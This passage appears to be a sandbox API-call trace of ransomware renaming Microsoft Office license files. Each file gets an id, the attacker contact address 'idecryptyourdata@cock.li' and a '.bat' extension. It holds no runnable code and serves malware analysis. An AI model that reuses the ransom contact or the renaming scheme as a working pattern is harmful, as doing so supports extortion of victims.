lpNewFilePointer=0x0) returned 1 [0164.638] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.638] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusDemoR_BypassTrial180-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusdemor_bypasstrial180-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.639] CloseHandle (hObject=0x52c) returned 1 [0164.639] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.639] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusdemor_bypasstrial180-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.640] CloseHandle (hObject=0x52c) returned 1 [0164.641] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.641] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.641] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusMSDNR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusmsdnr_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.641] CloseHandle (hObject=0x52c) returned 1 [0164.645] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.645] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusMSDNR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusmsdnr_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.646] CloseHandle (hObject=0x52c) returned 1 [0164.647] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.647] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.647] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusMSDNR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusmsdnr_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.647] CloseHandle (hObject=0x52c) returned 1 [0164.648] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.648] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.649] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusMSDNR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusmsdnr_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.649] CloseHandle (hObject=0x52c) returned 1 [0164.649] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.650] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.650] CloseHandle (hObject=0x52c) returned 1 [0164.651] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.651] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.651] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.651] CloseHandle (hObject=0x52c) returned 1 [0164.651] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.651] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.652] CloseHandle (hObject=0x52c) returned 1 [0164.652] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.652] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.653] CloseHandle (hObject=0x52c) returned 1 [0164.653] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.653] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.653] CloseHandle (hObject=0x52c) returned 1 [0164.654] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.654] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.655] CloseHandle (hObject=0x52c) returned 1 [0164.655] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.655] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp2-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp2-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.656] CloseHandle (hObject=0x52c) returned 1 [0164.656] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.657] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.657] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp2-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp2-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.657] CloseHandle (hObject=0x52c) returned 1 [0164.658] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.658] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.658] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp2-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp2-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.658] CloseHandle (hObject=0x52c) returned 1 [0164.659] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.659] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.659] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp2-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp2-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.659] CloseHandle (hObject=0x52c) returned 1 [0164.660] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.660] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp3-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp3-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.872] CloseHandle (hObject=0x52c) returned 1 [0165.513] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.513] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.513] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessEntryR_PrepidBypass-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessentryr_prepidbypass-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.514] CloseHandle (hObject=0x52c) returned 1 [0165.515] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.515] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardMSDNR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardmsdnr_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.515] CloseHandle (hObject=0x52c) returned 1 [0165.516] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.516] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.517] CloseHandle (hObject=0x52c) returned 1 [0165.517] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.517] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.518] CloseHandle (hObject=0x52c) returned 1 [0165.519] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.519] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.519] CloseHandle (hObject=0x52c) returned 1 [0165.520] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.520] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.520] CloseHandle (hObject=0x52c) returned 1 [0165.522] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.522] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.522] CloseHandle (hObject=0x52c) returned 1 [0165.525] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.525] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.526] CloseHandle (hObject=0x52c) returned 1 [0165.527] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.528] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.528] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Trial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_trial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.529] CloseHandle (hObject=0x52c) returned 1 [0165.530] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.530] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.530] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Trial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_trial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.530] CloseHandle (hObject=0x52c) returned 1 [0165.531] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.531] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.531] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Trial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_trial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.531] CloseHandle (hObject=0x52c) returned 1 [0165.532] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.532] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_KMS_Client-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_kms_client-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.533] CloseHandle (hObject=0x52c) returned 1 [0165.533] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.534] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.534] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_KMS_Client-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_kms_client-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.534] CloseHandle (hObject=0x52c) returned 1 [0165.535] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.535] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.535] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_KMS_Client-ul.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_kms_client-ul.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.535] CloseHandle (hObject=0x52c) returned 1 [0165.536] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.536] 